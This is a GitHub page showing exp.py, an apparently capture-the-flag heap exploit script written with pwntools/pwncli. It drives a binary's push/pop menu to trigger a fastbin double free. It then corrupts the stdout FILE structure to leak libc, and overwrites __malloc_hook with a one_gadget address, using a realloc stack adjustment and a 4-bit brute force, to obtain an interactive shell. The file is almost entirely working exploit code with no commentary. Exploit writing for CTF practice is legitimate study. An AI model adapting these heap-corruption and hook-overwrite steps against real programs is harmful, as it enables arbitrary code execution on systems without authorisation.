-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexp.py
executable file
·85 lines (67 loc) · 1.48 KB
/
exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# expBy : @eastXueLian
# Debug : ./exp.py debug ./pwn -t -b b+0xabcd
# Remote: ./exp.py remote ./pwn ip:port
from lianpwn import *
from pwncli import *
cli_script()
set_remote_libc(
"/home/eastxuelian/config/glibc-all-in-one/libs/2.24-9ubuntu2.2_amd64/libc.so.6"
)
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
def cmd(choice):
ru(b"[+]> ")
sl(i2b(choice))
def push(size, data):
cmd(1)
ru(b"How much?\n")
cmd(size)
ru(b"Data?\n")
s(data)
def pop(idx):
cmd(2)
ru(b"Which one?\n")
cmd(idx)
for i in range(0x10):
push(0x6F, i2b(i) * 8)
for i in range(0x10 - 1):
pop(i)
ru(b"[+]> ")
sl(b"9" * 0x400)
push(0x60, b"aaa")
push(0x60, b"bbb")
luckybit = __import__("random").randint(1, 15)
push(0x60, p16(0x5BD | (luckybit << 12)))
# push(0x60, p16(0x1ACD))
pop(0x10)
pop(0x11)
pop(0x10)
push(0x60, p8(0xE0))
push(0x60, p8(0xE0))
push(0x60, p64(0xDEADBEEF))
push(0x60, p8(0xE0))
push(0x66, b"\x00" * 0x33 + p64(0xFBAD1887) + p64(0) * 3 + p8(0))
ru(p64(0xFBAD1887) + p64(0) * 3)
libc_base = u64_ex(rn(8)) - 0x3C2600
lg("libc_base", libc_base)
debugB()
push(0x60, b"ccc")
push(0x60, b"ddd")
pop(0x18)
pop(0x19)
pop(0x18)
push(0x60, p64(libc_base + 0x3C1ACD))
push(0x60, p64(0xCAFECAFE))
push(0x60, p64(0xCAFECAFE))
og = [0x4557A, 0xF1651, 0xF24CB]
push(
0x60,
b"\x00" * (0x13 - 8) + p64(libc_base + og[2]) + p64(libc_base + libc.sym.realloc),
)
cmd(1)
ru(b"?\n")
cmd(0x20)
ia()